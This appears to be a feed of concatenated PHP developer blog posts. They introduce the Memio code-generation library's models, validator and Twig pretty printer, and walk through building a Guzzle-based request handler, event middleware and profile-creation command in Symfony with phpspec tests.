For now the only package available is TwigTemplateEngine, it provides Twig templates.
Enough talk, let's code! First of all we have to create our PrettyPrinter:
<?php
require __DIR__.'/vendor/autoload.php';
$loader = new \Twig_Loader_Filesystem(\Memio\TwigTemplateEngine\Config\Locate::templates());
$twig = new \Twig_Environment($loader);
$line = new \Memio\TwigTemplateEngine\TwigExtension\Line\Line();
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\ContractLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\FileLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\MethodPhpdocLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\ObjectLineStrategy());
$line->add(new \Memio\TwigTemplateEngine\TwigExtension\Line\StructurePhpdocLineStrategy());
$twig->addExtension(new \Memio\TwigTemplateEngine\TwigExtension\Type());
$twig->addExtension(new \Memio\TwigTemplateEngine\TwigExtension\Whitespace($line));
$templateEngine = new \Memio\TwigTemplateEngine\TwigTemplateEngine($twig);
$prettyPrinter = new \Memio\PrettyPrinter\PrettyPrinter($templateEngine);
Wow! That was quite painful to write! Thankfully the next package to be released
will make life much easier (spoiler alert: Build::prettyPrinter()).
Now let's build some models:
// ...
$myMethod = new \Memio\Model\Method('myMethod');
for ($i = 1; $i < 10; $i++) {
$myMethod->addArgument(new \Memio\Model\Argument('mixed', 'argument'.$i));
}
All it takes to generate the code is this:
// ...
$generatedCode = $prettyPrinter->generateCode($myMethod);
Let's see in the console output what it did:
// ...
echo $generatedCode;
We should get the following:
public function myMethod(
$argument1,
$argument2,
$argument3,
$argument4,
$argument5,
$argument6,
$argument7,
$argument8,
$argument9
)
{
}
Each argument is displayed on its own line, because the inline equivalent would have been longer than 120 characters.
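The decision can be sketched as follows (the 120-character limit comes from the article; the function below is illustrative, not Memio's actual template logic):

```php
<?php

// Illustrative sketch of the inline-vs-multiline decision: if the inline
// rendering of the arguments fits in 120 characters, keep it on one line,
// otherwise put each argument on its own line.
function printArguments($prefix, array $argumentNames)
{
    $inline = $prefix.'('.implode(', ', $argumentNames).')';
    if (strlen($inline) <= 120) {
        return $inline;
    }

    return $prefix."(\n    ".implode(",\n    ", $argumentNames)."\n)";
}

echo printArguments('public function handle', array('$request', '$type', '$catch'));
// public function handle($request, $type, $catch)
```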
Memio has extra rules regarding coding standards, for example it adds an empty line between the PHP opening tag and the namespace statement.
We can get rid of this by creating our own custom template: first we copy the file.twig
template in our project:
{#- File: my_templates/file.twig -#}
<?php
{% if file.licensePhpdoc is not empty %}
{% include 'phpdoc/license_phpdoc.twig' with { 'license_phpdoc': file.licensePhpdoc } only %}
{% endif %}
namespace {{ file.namespace }};
{% include 'collection/fully_qualified_name_collection.twig' with {
'fully_qualified_name_collection': file.allFullyQualifiedNames
} only %}
{% if needs_line_after(file, 'fully_qualified_names') %}
{% endif %}
{% if file.structure is contract %}
{% include 'contract.twig' with { 'contract': file.structure } only %}
{% else %}
{% include 'object.twig' with { 'object': file.structure } only %}
{% endif %}
We've removed the line between {% endif %} and namespace {{ file.namespace }};.
In order for our custom template to be used, we'll need to add its directory path to PrettyPrinter:
// ...
$prettyPrinter->addTemplatePath(__DIR__.'/my_templates');
And we're done!
Let's check the result:
// ...
$file = \Memio\Model\File::make('src/Vendor/Project/MyClass.php')
->setStructure(new \Memio\Model\Object('Vendor\Project\MyClass'))
;
echo $prettyPrinter->generateCode($file);
This will output:
<?php
namespace Vendor\Project;
class MyClass
{
}
PrettyPrinter can convert Models into PHP code. It uses templates behind the scenes, so we can tweak the coding style our way. It isn't tied to any Template Engine, but we can install Memio's TwigTemplateEngine package.
]]>TL;DR: Write constraints to check model integrity. Linter constraints (e.g. syntax error) are already available.
Every day, Memio, the highly opinionated PHP code generation library, progresses toward its stable release.
In this article, we'll have a look at two packages that have been freshly extracted:
memio/validator and memio/linter.
The validator package provides an easy way to write constraints. Let's write one to check that method arguments are never scalar.
Note: This is one of the principles of object calisthenics: wrap all primitives and strings.
<?php
require __DIR__.'/vendor/autoload.php';
use Memio\Validator\Constraint;
use Memio\Validator\Violation\NoneViolation;
use Memio\Validator\Violation\SomeViolation;
class ArgumentCannotBeScalar implements Constraint
{
public function validate($model)
{
$type = $model->getType();
if (in_array($type, array('array', 'bool', 'callable', 'double', 'int', 'mixed', 'null', 'resource', 'string'), true)) {
return new SomeViolation(sprintf('Argument "%s" cannot be scalar', $model->getName()));
}
return new NoneViolation();
}
}
Note: Naming constraints after their error message allows for better readability.
The next step is to register our constraint in a validator. Since our constraint
targets Argument models, we'll register it in an ArgumentValidator:
// ...
use Memio\Validator\ModelValidator\ArgumentValidator;
$argumentValidator = new ArgumentValidator();
$argumentValidator->add(new ArgumentCannotBeScalar());
When building models, Arguments are buried in Methods, which themselves are buried in
Contracts or Objects, which in turn are buried in a File.
To make things easy, we'd like to simply give the topmost model (e.g. File) to
a generic Validator. Its responsibility would be to go through each model and execute
the appropriate ModelValidator.
In order to do so, we have to create all the ModelValidators and assemble them as follows:
// ...
use Memio\Validator\ModelValidator\CollectionValidator;
use Memio\Validator\ModelValidator\ContractValidator;
use Memio\Validator\ModelValidator\FileValidator;
use Memio\Validator\ModelValidator\MethodValidator;
use Memio\Validator\ModelValidator\ObjectValidator;
$collectionValidator = new CollectionValidator();
$methodValidator = new MethodValidator($argumentValidator, $collectionValidator);
$contractValidator = new ContractValidator($collectionValidator, $methodValidator);
$objectValidator = new ObjectValidator($collectionValidator, $methodValidator);
$fileValidator = new FileValidator($contractValidator, $objectValidator);
Finally, we need to create a validator and register our ModelValidators in it:
// ...
use Memio\Validator\Validator;
$calisthenicValidator = new Validator();
$calisthenicValidator->add($argumentValidator);
$calisthenicValidator->add($collectionValidator);
$calisthenicValidator->add($methodValidator);
$calisthenicValidator->add($contractValidator);
$calisthenicValidator->add($objectValidator);
$calisthenicValidator->add($fileValidator);
We can now validate our Models:
// ...
$calisthenicValidator->validate($file); // @throws Memio\Validator\InvalidModelException if one or more constraint fail
The InvalidModelException's message has one line per violation.
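The way such a message can be assembled is straightforward (illustrative sketch, not Memio's actual code):

```php
<?php

// Illustrative sketch: collecting violation messages and joining them with
// newlines yields an exception message with one line per violation.
$violations = array(
    'Argument "type" cannot be scalar',
    'Method "handle" cannot be both abstract and final',
);
$exception = new \InvalidArgumentException(implode("\n", $violations));

echo $exception->getMessage();
```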
Out of the box, Memio provides a Linter which ships with the following constraints:
As we've seen above, constructing and assembling constraints and validators can be quite tiresome.
That's where memio/memio, the main repository, starts to be useful by
providing a simple way to get a ready-to-use linter:
<?php
require __DIR__.'/vendor/autoload.php';
use Memio\Memio\Config\Build;
$linter = Build::linter();
$linter->validate($file); // @throws Memio\Validator\InvalidModelException if one or more constraint fail
Validator allows the creation of custom constraints to ensure that the built Models are valid. Linter is a ready-to-use set of constraints, preventing syntax errors (e.g. a method cannot be both final and abstract).
If you'd like to find out more about Memio Validator, have a look at the documentation:
]]>TL;DR: Describe code by building models.
Memio is a highly opinionated PHP code generation library, its version 1.0.0 (stable)
is going to be released soon: currently the main package memio/memio is being
split into smaller packages.
In this article, we'll have a look at the very first package to be ready: memio/model.
Let's have a look at the following method:
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true)
{
}
We have many things here: a method named handle, which is public. It has the following arguments:
- a Request object named request
- type, which defaults to self::MASTER_REQUEST
- catch, which defaults to true
Memio provides models that allow us to describe this method by constructing objects:
<?php
use Memio\Model\Argument;
use Memio\Model\Method;
require __DIR__.'/vendor/autoload.php';
$method = Method::make('handle')
->addArgument(Argument::make('Request', 'request'))
->addArgument(Argument::make('int', 'type')
->setDefaultValue('self::MASTER_REQUEST')
)
->addArgument(Argument::make('bool', 'catch')
->setDefaultValue('true')
)
;
Note: Static constructors are used to allow a fluent interface (chaining calls). Since PHP 5.4 it is also possible to do the following:
(new Method('handle'))->addArgument(new Argument('Request', 'request'));
Usually models aren't built manually, they could be constructed using:
Here's a usage example. When running the test suite, phpspec generates missing methods in our code (amongst many other nice things).
If the following call is found in a test:
$this->handle($request);
And if the handle method isn't defined in the class currently tested, then phpspec
gathers the following parameters:
- $methodName, which here is set to 'handle'
- $arguments, which here is set to array($request)
Let's re-write its generator using Memio:
<?php
use Memio\Model\Argument;
use Memio\Model\Method;
require __DIR__.'/vendor/autoload.php';
function phpspec_generator($methodName, array $arguments) {
$method = new Method($methodName);
$index = 1;
foreach ($arguments as $argument) {
$type = is_object($argument) ? get_class($argument) : gettype($argument);
$argumentName = 'argument'.$index++;
$method->addArgument(new Argument($type, $argumentName));
}
return $method;
}
Pretty straightforward!
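The type-guessing line in phpspec_generator can be exercised on its own, without Memio (illustrative helper):

```php
<?php

// Same rule as in phpspec_generator above: objects yield their class name,
// anything else yields its native type name.
function guessType($argument)
{
    return is_object($argument) ? get_class($argument) : gettype($argument);
}

echo guessType(new \DateTime()), "\n"; // DateTime
echo guessType(42), "\n";              // integer
echo guessType(true), "\n";            // boolean
```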
Models are Memio's core: almost every Memio package relies on them:
- memio/linter will scan models to detect errors (e.g. abstract methods in a final class)
- memio/twig-template will use them to actually generate the corresponding code
For now they can describe:
There are some limitations: for example, a method body can only be described with a string (e.g. "$toto = 42;\necho $toto;").
For now, it will be sufficient to start working on exciting projects!
If you'd like to find out more about Memio Models, have a look at the documentation:
]]>TL;DR: Work in Progress: Memio, a library for PHP code generation.
Code generators write code for you, so you don't have to! There are many kinds out there:
Many frameworks provide code generators, because they can be real time savers by automating repetitive, boring tasks (e.g. bootstrapping a CRUD controller). The only issue is that usually we can't customize them.
For example with GeneratorBundle, it's impossible to create REST controllers.
Some of them provide templates but no template engine (phpspec, for example): this is a step forward, but not enough.
Now let's have a look at code generator libraries: the main ones don't allow an easy way to customize the coding style of generated code:
Some of them do use a template engine, but you need to write a lot of code in order to use them:
Don't panic! Memio is a code generator library that uses a template engine and provides out-of-the-box templates, generators and even validation!
Started in September 2014 under the name "Medio", it has now matured enough to soon be released as stable (1.0.0).
Let's have a look at what's going to be achieved with it.
The phpspec typehint extension was a good playground for Memio: it allowed testing the generation of a method argument by:
Once Memio is stable, it will provide its own phpspec extension that aims at:
Curious about this last bullet point? Then read on.
There are many ways to use constructors, and one of them is dependency injection: each argument is stored in a property and the class can then use them.
Note: Remember, Dependency Injection is a fancy word for passing arguments.
When doing so, we need to write a lot of boilerplate code:
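The boilerplate in question typically looks like this (the class and dependency names below are illustrative):

```php
<?php

// Typical constructor dependency-injection boilerplate: for each injected
// dependency we declare a property, add a constructor argument and assign it.
class SomeService
{
    private $client;
    private $logger;

    public function __construct($client, $logger)
    {
        $this->client = $client;
        $this->logger = $logger;
    }
}

var_dump(new SomeService('client', 'logger') instanceof SomeService); // bool(true)
```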
Memio will automate this in its phpspec extension.
We talked about GeneratorBundle: the issue is that we can't define our own templates. Well Memio could solve this issue in a reusable way!
Usually each application has its own style, its own requirements, etc. In short: we can't use the same code generator between projects. But if we focus on a single project, then we can start using the same code generator to bootstrap many classes: endpoint/page controllers, entities, etc. The possibilities are endless!
Memio, once stable, will provide a powerful and reusable way of generating code.
What's left to do before the release of v1.0? Mainly splitting the main package
(memio/memio) into smaller ones (model, template-engine, validator, etc.).
The main package would become a "standard edition", allowing developers to select
the features they want, for example the template engine (as requested
by webmozart).
Stay tuned!
I'd like to thank the following early contributors:
Keep up the good work!
]]>TL;DR: Happy April Fools' joke!
Hello World applications are often used to showcase framework capabilities, but they usually fail to do so! This is because real world applications are never that simple.
In this series of articles, we will demonstrate how to build a real world Hello World application.
The first part will include the following standard technologies:
In the second part, we'll take things to the advanced level:
In the conclusion we'll explore Docker, Go Martini (for faster GET endpoints), Python Beautiful Soup (for web crawling) and NodeJS (to monitor our queues).
Of course we're going to use full stack BDD all along!
Get ready for the best "Hello World" application you've ever seen!
This was my April Fools' joke. Now let's get serious and build what I think is the best Hello World application:
<?php
echo 'Hello world';
Note that there's no Symfony, no RabbitMQ, no nothing involved. That's because a Hello World application doesn't require anything else; those tools were designed to solve issues that we don't have here.
If you're concerned about our Hello World application's performance, you shouldn't be. First of all, it's a Hello World application... As far as I'm concerned, it prints pretty much instantly this way.
Second of all, you shouldn't worry about performance when building an application: that's something to start worrying about only when you actually have performance issues. The best thing you can do is build the application in a way that allows you to change it afterwards if the need arises (and it usually will: requirements are changing by nature).
I hope you enjoyed it :) .
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the seventh article of the series on managing Web Services in a Symfony environment. Have a look at the six first ones:
You can check the code in the following repository.
In the previous article, we created a Guzzle RequestHandler: we are now able to make remote calls using a third-party library, but without the cost of coupling ourselves to it. If Guzzle 6 is released, we'll only have to change one class, instead of making changes everywhere in our application.
In this article, we'll create the actual remote calls.
The web service we want to call requires us to authenticate. Those credentials shouldn't be hardcoded, so we'll create new parameters for them (same goes for the URL):
# File: app/config/parameters.yml.dist
ws_url: http://example.com
ws_username: username
ws_password: ~
We can then set those values in the actual parameter file:
# File: app/config/parameters.yml
ws_url: "http://ws.local/app_dev.php"
ws_username: spanish_inquisition
ws_password: "NobodyExpectsIt!"
Note that because our password contains a character which is reserved in YAML (!),
we need to put the value between double quotes (same goes for % and @).
Let's commit this:
git add -A
git commit -m 'Added credentials configuration'
We can create a Gateway specialized in calling the profile web service:
./bin/phpspec describe 'AppBundle\Profile\ProfileGateway'
Usually we categorize our Symfony applications by pattern: we'd create a Gateway
directory with all the Gateway services. However, this can become quite cumbersome
when the application grows: services are usually linked to a model, meaning that
we'd have to jump from the Model (or Entity) directory to the Gateway one,
then go to the Factory directory, etc.
Here we've chosen an alternative: group services by model. All Profile services
can be found in the same directory.
Let's write the Gateway's specification:
<?php
// File: spec/AppBundle/Profile/ProfileGatewaySpec.php
namespace spec\AppBundle\Profile;
use AppBundle\RequestHandler\RequestHandler;
use AppBundle\RequestHandler\Response;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class ProfileGatewaySpec extends ObjectBehavior
{
const URL = 'http://example.com';
const USERNAME = 'spanish inquisition';
const PASSWORD = 'nobody expects it';
const ID = 42;
const NAME = 'Arthur';
function let(RequestHandler $requestHandler)
{
$this->beConstructedWith($requestHandler, self::URL, self::USERNAME, self::PASSWORD);
}
function it_creates_profiles(RequestHandler $requestHandler, Response $response)
{
$profile = array(
'id' => self::ID,
'name' => self::NAME,
);
$request = Argument::type('AppBundle\RequestHandler\Request');
$requestHandler->handle($request)->willReturn($response);
$response->getBody()->willReturn($profile);
$this->create(self::NAME)->shouldBe($profile);
}
}
We can now generate the code's skeleton:
./bin/phpspec run
It constructs a Request object, gives it to RequestHandler and then returns the
Response's body:
<?php
// File: src/AppBundle/Profile/ProfileGateway.php
namespace AppBundle\Profile;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
class ProfileGateway
{
private $requestHandler;
private $url;
private $username;
private $password;
public function __construct(RequestHandler $requestHandler, $url, $username, $password)
{
$this->requestHandler = $requestHandler;
$this->username = $username;
$this->password = $password;
}
public function create($name)
{
$request = new Request('POST', $this->url.'/api/v1/profiles');
$request->setHeader('Authorization', 'Basic '.base64_encode($this->username.':'.$this->password));
$request->setHeader('Content-Type', 'application/json');
$request->setBody(json_encode(array('name' => $name)));
$response = $this->requestHandler->handle($request);
return $response->getBody();
}
}
Note: Managing URLs can become quite tricky when the number of routes grows. Sometimes we'll want HTTPS, sometimes HTTP. Sometimes we'll want the first version of the API, sometimes the pre production one. And what should we do when we'll need query parameters?
Usually I don't bother with those until the need is actually there; then I create a UrlGenerator which works a bit like Symfony's one and relies on a configuration array.
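As a hypothetical sketch (the class and route names below are made up, not part of the series' code), such a UrlGenerator could look like this:

```php
<?php

// Hypothetical UrlGenerator sketch, as hinted at in the note above:
// routes are described in a configuration array and looked up by name,
// with placeholders replaced by the given parameters.
class UrlGenerator
{
    private $baseUrl;
    private $routes;

    public function __construct($baseUrl, array $routes)
    {
        $this->baseUrl = $baseUrl;
        $this->routes = $routes;
    }

    public function generate($name, array $parameters = array())
    {
        $path = $this->routes[$name];
        foreach ($parameters as $key => $value) {
            $path = str_replace('{'.$key.'}', $value, $path);
        }

        return $this->baseUrl.$path;
    }
}

$urlGenerator = new UrlGenerator('http://ws.local/app_dev.php', array(
    'profile_create' => '/api/v1/profiles',
    'profile_show'   => '/api/v1/profiles/{id}',
));

echo $urlGenerator->generate('profile_show', array('id' => 42));
// http://ws.local/app_dev.php/api/v1/profiles/42
```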
Let's check our tests:
./bin/phpspec run
All green!
git add -A
git commit -m 'Created ProfileGateway'
Our application happens to be a Command Line Interface (CLI). We want to write a command to create profiles, and as usual we'll begin with a test:
<?php
// File: tests/Command/CreateProfileCommandTest.php
namespace AppBundle\Tests\Command;
use PHPUnit_Framework_TestCase;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Output\NullOutput;
use Symfony\Component\Console\Input\ArrayInput;
class CreateProfileCommandTest extends PHPUnit_Framework_TestCase
{
private $app;
private $output;
protected function setUp()
{
$kernel = new \AppKernel('test', false);
$this->app = new Application($kernel);
$this->app->setAutoExit(false);
$this->output = new NullOutput();
}
public function testItRunsSuccessfully()
{
$input = new ArrayInput(array(
'commandName' => 'app:profile:create',
'name' => 'Igor',
));
$exitCode = $this->app->run($input, $this->output);
$this->assertSame(0, $exitCode);
}
}
Let's make this test pass:
<?php
// File: src/AppBundle/Command/CreateProfileCommand.php
namespace AppBundle\Command;
use Symfony\Bundle\FrameworkBundle\Command\ContainerAwareCommand;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class CreateProfileCommand extends ContainerAwareCommand
{
protected function configure()
{
$this->setName('app:profile:create');
$this->setDescription('Create a new profile');
$this->addArgument('name', InputArgument::REQUIRED);
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$profileGateway = $this->getContainer()->get('app.profile_gateway');
$profile = $profileGateway->create($input->getArgument('name'));
$output->writeln(sprintf('Profile #%s "%s" created', $profile['id'], $profile['name']));
}
}
We'll need to define ProfileGateway as a service:
# File: app/config/services.yml
imports:
- { resource: services/request_handler.yml }
services:
app.profile_gateway:
class: AppBundle\Profile\ProfileGateway
arguments:
- "@app.request_handler"
- "%ws_url%"
- "%ws_username%"
- "%ws_password%"
By having a look at ProfileGateway we can spot a mistake: the initialization of the URL
is missing from the constructor:
<?php
// File: src/AppBundle/Profile/ProfileGateway.php
public function __construct(RequestHandler $requestHandler, $url, $username, $password)
{
$this->requestHandler = $requestHandler;
$this->username = $username;
$this->password = $password;
$this->url = $url;
}
Another mistake lies in JsonResponseListener, each Guzzle header is an array:
<?php
// File: src/AppBundle/RequestHandler/Listener/JsonResponseListener.php
$contentType = $response->getHeader('Content-Type');
if (false === strpos($contentType[0], 'application/json')) {
return;
}
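The gotcha can be reproduced without Guzzle (the data below is illustrative): when a header value is an array of strings, strpos must be given the first element, not the array itself.

```php
<?php

// Illustrative reproduction of the gotcha fixed above: Guzzle returns each
// header as an array of values, so strpos needs the first element.
$headers = array('Content-Type' => array('application/json; charset=utf-8'));
$contentType = $headers['Content-Type'];

var_dump(false !== strpos($contentType[0], 'application/json')); // bool(true)
```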
With these fixes, the test should pass:
phpunit -c app
Note: if we get a You have requested a non-existent service "app.profile_gateway" error, we might need to clear the cache for the test environment: php app/console cache:clear --env=test.
Note: if we get a Guzzle exception, we need to check that the previous application ("ws.local") is installed, and that its database is created:
cd ../ws
php app/console doctrine:database:create
php app/console doctrine:schema:create
cd ../cs
We can now save our work:
git add -A
git commit -m 'Created CreateProfileCommand'
We now have an application that consumes a web service. We have decoupled it from third-party libraries using RequestHandler and isolated the endpoint logic in a Gateway class.
There's a lot to say about the test we wrote: it makes a network call, which is slow and unreliable, and it isn't idempotent. If we try to run our test again, it will fail! To fix this we have many possibilities:
At this point it depends on how confident we are in the web services and what we want to test.
We should also write more tests on edge cases: what happens with wrong credentials? What happens if the endpoint cannot be reached (request timeout, connection timeout, etc.)? What happens when we try to create a profile which already exists?
As it happens, this is also the conclusion of this series on managing Web Services in a Symfony environment. There's a lot more to say, for example about caching remote resources in a local database, about self-discovering APIs and about micro services, but I feel those should each have their own series of articles :) .
]]>Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the sixth article of the series on managing Web Services in a Symfony environment. Have a look at the five first ones:
You can check the code in the following repository.
In the previous article, we bootstrapped an application with a RequestHandler, allowing us to be decoupled from the third-party library we'll choose to request remote endpoints.
In this article, we'll create a Guzzle 5 implementation.
As usual, we first describe the class we want to create:
./bin/phpspec describe 'AppBundle\RequestHandler\Middleware\GuzzleRequestHandler'
Our Guzzle implementation will translate our Request into a Guzzle one, and a
Guzzle response into our Response:
<?php
// spec/AppBundle/RequestHandler/Middleware/GuzzleRequestHandlerSpec.php
namespace spec\AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Request;
use GuzzleHttp\ClientInterface;
use GuzzleHttp\Message\RequestInterface;
use GuzzleHttp\Message\ResponseInterface;
use GuzzleHttp\Stream\StreamInterface;
use PhpSpec\ObjectBehavior;
class GuzzleRequestHandlerSpec extends ObjectBehavior
{
const VERB = 'POST';
const URI = '/api/v1/profiles';
const HEADER_NAME = 'Content-Type';
const HEADER_VALUE = 'application/json';
const BODY = '{"username":"King Arthur"}';
function let(ClientInterface $client)
{
$this->beConstructedWith($client);
}
function it_is_a_request_handler()
{
$this->shouldImplement('AppBundle\RequestHandler\RequestHandler');
}
function it_uses_guzzle_to_do_the_actual_request(
ClientInterface $client,
RequestInterface $guzzleRequest,
ResponseInterface $guzzleResponse,
StreamInterface $stream
)
{
$request = new Request(self::VERB, self::URI);
$request->setHeader(self::HEADER_NAME, self::HEADER_VALUE);
$request->setBody(self::BODY);
$client->createRequest(self::VERB, self::URI, array(
'headers' => array(self::HEADER_NAME => self::HEADER_VALUE),
'body' => self::BODY,
))->willReturn($guzzleRequest);
$client->send($guzzleRequest)->willReturn($guzzleResponse);
$guzzleResponse->getStatusCode()->willReturn(201);
$guzzleResponse->getHeaders()->willReturn(array('Content-Type' => 'application/json'));
$guzzleResponse->getBody()->willReturn($stream);
$stream->__toString()->willReturn('{"id":42,"username":"King Arthur"}');
$this->handle($request)->shouldHaveType('AppBundle\RequestHandler\Response');
}
}
Time to bootstrap this implementation:
./bin/phpspec run
And to actually write it:
<?php
// File: src/AppBundle/RequestHandler/Middleware/GuzzleRequestHandler.php
namespace AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
use AppBundle\RequestHandler\Response;
use GuzzleHttp\ClientInterface;
use GuzzleHttp\Message\RequestInterface;
use GuzzleHttp\Message\ResponseInterface;
use GuzzleHttp\Stream\StreamInterface;
class GuzzleRequestHandler implements RequestHandler
{
private $client;
public function __construct(ClientInterface $client)
{
$this->client = $client;
}
public function handle(Request $request)
{
$guzzleRequest = $this->client->createRequest($request->getVerb(), $request->getUri(), array(
'headers' => $request->getHeaders(),
'body' => $request->getBody(),
));
$guzzleResponse = $this->client->send($guzzleRequest);
$response = new Response($guzzleResponse->getStatusCode());
$response->setHeaders($guzzleResponse->getHeaders());
$response->setBody($guzzleResponse->getBody()->__toString());
return $response;
}
}
Let's check it:
./bin/phpspec run
Brilliant!
git add -A
git commit -m 'Created GuzzleRequestHandler'
In the future we'd like to be able to hook into the RequestHandler's workflow,
for example to convert the Response's body into an array when it is JSON.
This kind of thing can be done by dispatching events, in our case when a Response is received:
<?php
// File: src/AppBundle/RequestHandler/Event/ReceivedResponse.php
namespace AppBundle\RequestHandler\Event;
use AppBundle\RequestHandler\Response;
use Symfony\Component\EventDispatcher\Event;
class ReceivedResponse extends Event
{
private $response;
public function __construct(Response $response)
{
$this->response = $response;
}
public function getResponse()
{
return $this->response;
}
}
Note: This is a simple Data Transfer Object (DTO): it doesn't contain any logic and never will. This means we don't have to write any tests for it.
We could add an EventDispatcher in GuzzleRequestHandler, or we could create
a middleware: a RequestHandler that dispatches events and then calls another RequestHandler
(e.g. GuzzleRequestHandler):
./bin/phpspec describe 'AppBundle\RequestHandler\Middleware\EventRequestHandler'
This way, if we want to throw away GuzzleRequestHandler and replace it with something
else, we don't have to rewrite the dispatching code. Here's the specification:
<?php
// File: spec/AppBundle/RequestHandler/Middleware/EventRequestHandlerSpec.php
namespace spec\AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
use AppBundle\RequestHandler\Response;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
use Symfony\Component\EventDispatcher\EventDispatcherInterface;
class EventRequestHandlerSpec extends ObjectBehavior
{
function let(EventDispatcherInterface $eventDispatcher, RequestHandler $requestHandler)
{
$this->beConstructedWith($eventDispatcher, $requestHandler);
}
function it_is_a_request_handler()
{
$this->shouldImplement('AppBundle\RequestHandler\RequestHandler');
}
function it_dispatches_events(
EventDispatcherInterface $eventDispatcher,
Request $request,
RequestHandler $requestHandler,
Response $response
)
{
$requestHandler->handle($request)->willReturn($response);
$receivedResponse = Argument::type('AppBundle\RequestHandler\Event\ReceivedResponse');
$eventDispatcher->dispatch('request_handler.received_response', $receivedResponse)->shouldBeCalled();
$this->handle($request)->shouldBe($response);
}
}
Note: We could improve this middleware by dispatching an event before giving the request to the RequestHandler. We could also catch exceptions coming from the RequestHandler and dispatch an event.
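To make the suggested improvements concrete, here's a hedged, self-contained sketch of a middleware that dispatches before the request, after the response, and on failure. The class and event names (`ImprovedEventHandler`, `request_handler.sending_request`, `request_handler.request_failed`) are assumptions of mine, not part of the article's code, and a minimal dispatcher stands in for Symfony's so the sketch runs on its own:

```php
<?php
// Minimal stand-ins so the sketch is runnable without Symfony.
interface Dispatcher { public function dispatch($name, $event = null); }
interface Handler { public function handle($request); }

class RecordingDispatcher implements Dispatcher
{
    public $dispatched = array();

    public function dispatch($name, $event = null)
    {
        $this->dispatched[] = $name;
    }
}

// Hypothetical improved middleware: dispatches before, after, and on error.
class ImprovedEventHandler implements Handler
{
    private $dispatcher;
    private $inner;

    public function __construct(Dispatcher $dispatcher, Handler $inner)
    {
        $this->dispatcher = $dispatcher;
        $this->inner = $inner;
    }

    public function handle($request)
    {
        $this->dispatcher->dispatch('request_handler.sending_request');
        try {
            $response = $this->inner->handle($request);
        } catch (\Exception $e) {
            // Let listeners react to the failure, then re-throw.
            $this->dispatcher->dispatch('request_handler.request_failed');
            throw $e;
        }
        $this->dispatcher->dispatch('request_handler.received_response');

        return $response;
    }
}
```

The real implementation would pass event objects (like ReceivedResponse) instead of bare names, but the control flow would be the same.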
Time to bootstrap the code:
./bin/phpspec run
And to make the test pass:
<?php
// File: src/AppBundle/RequestHandler/Middleware/EventRequestHandler.php
namespace AppBundle\RequestHandler\Middleware;
use AppBundle\RequestHandler\Event\ReceivedResponse;
use AppBundle\RequestHandler\Request;
use AppBundle\RequestHandler\RequestHandler;
use Symfony\Component\EventDispatcher\EventDispatcherInterface;
class EventRequestHandler implements RequestHandler
{
private $eventDispatcher;
private $requestHandler;
public function __construct(EventDispatcherInterface $eventDispatcher, RequestHandler $requestHandler)
{
$this->eventDispatcher = $eventDispatcher;
$this->requestHandler = $requestHandler;
}
public function handle(Request $request)
{
$response = $this->requestHandler->handle($request);
$this->eventDispatcher->dispatch('request_handler.received_response', new ReceivedResponse($response));
return $response;
}
}
Did we succeed?
./bin/phpspec run
Yes, we did:
git add -A
git commit -m 'Created EventRequestHandler'
When a Response contains a JSON body, we need to decode it into a PHP array, and to fail loudly when the JSON is invalid.
With this in mind, we can describe the listener:
./bin/phpspec describe 'AppBundle\RequestHandler\Listener\JsonResponseListener'
Now we can write the specification:
<?php
// File: spec/AppBundle/RequestHandler/Listener/JsonResponseListenerSpec.php
namespace spec\AppBundle\RequestHandler\Listener;
use AppBundle\RequestHandler\Event\ReceivedResponse;
use AppBundle\RequestHandler\Response;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class JsonResponseListenerSpec extends ObjectBehavior
{
function it_handles_json_response(ReceivedResponse $receivedResponse, Response $response)
{
$receivedResponse->getResponse()->willReturn($response);
$response->getHeader('Content-Type')->willReturn('application/json');
$response->getBody()->willReturn('{"data":[]}');
$response->setBody(array('data' => array()))->shouldBeCalled();
$this->onReceivedResponse($receivedResponse);
}
function it_does_not_handle_non_json_response(ReceivedResponse $receivedResponse, Response $response)
{
$receivedResponse->getResponse()->willReturn($response);
$response->getHeader('Content-Type')->willReturn('text/html');
$response->getBody()->shouldNotBeCalled();
$this->onReceivedResponse($receivedResponse);
}
function it_fails_to_handle_invalid_json(ReceivedResponse $receivedResponse, Response $response)
{
$receivedResponse->getResponse()->willReturn($response);
$response->getHeader('Content-Type')->willReturn('application/json');
$response->getBody()->willReturn('{"data":[');
$exception = 'Exception';
$this->shouldThrow($exception)->duringOnReceivedResponse($receivedResponse);
}
}
Time to implement the code:
<?php
// File: src/AppBundle/RequestHandler/Listener/JsonResponseListener.php
namespace AppBundle\RequestHandler\Listener;
use AppBundle\RequestHandler\Event\ReceivedResponse;
use Exception;
class JsonResponseListener
{
public function onReceivedResponse(ReceivedResponse $receivedResponse)
{
$response = $receivedResponse->getResponse();
$contentType = $response->getHeader('Content-Type');
if (false === strpos($contentType, 'application/json')) {
return;
}
$body = $response->getBody();
$json = json_decode($body, true);
if (json_last_error()) {
throw new Exception("Invalid JSON: $body");
}
$response->setBody($json);
}
}
Is it enough to make the tests pass?
./bin/phpspec run
Yes, we can commit:
git add -A
git commit -m 'Created JsonResponseListener'
In order to be able to use this code in our Symfony application, we need to
define those classes as services. Since we'll have a lot of definitions, we'll
create a services directory:
mkdir app/config/services
We'll update services.yml to include our new file:
# File: app/config/services.yml
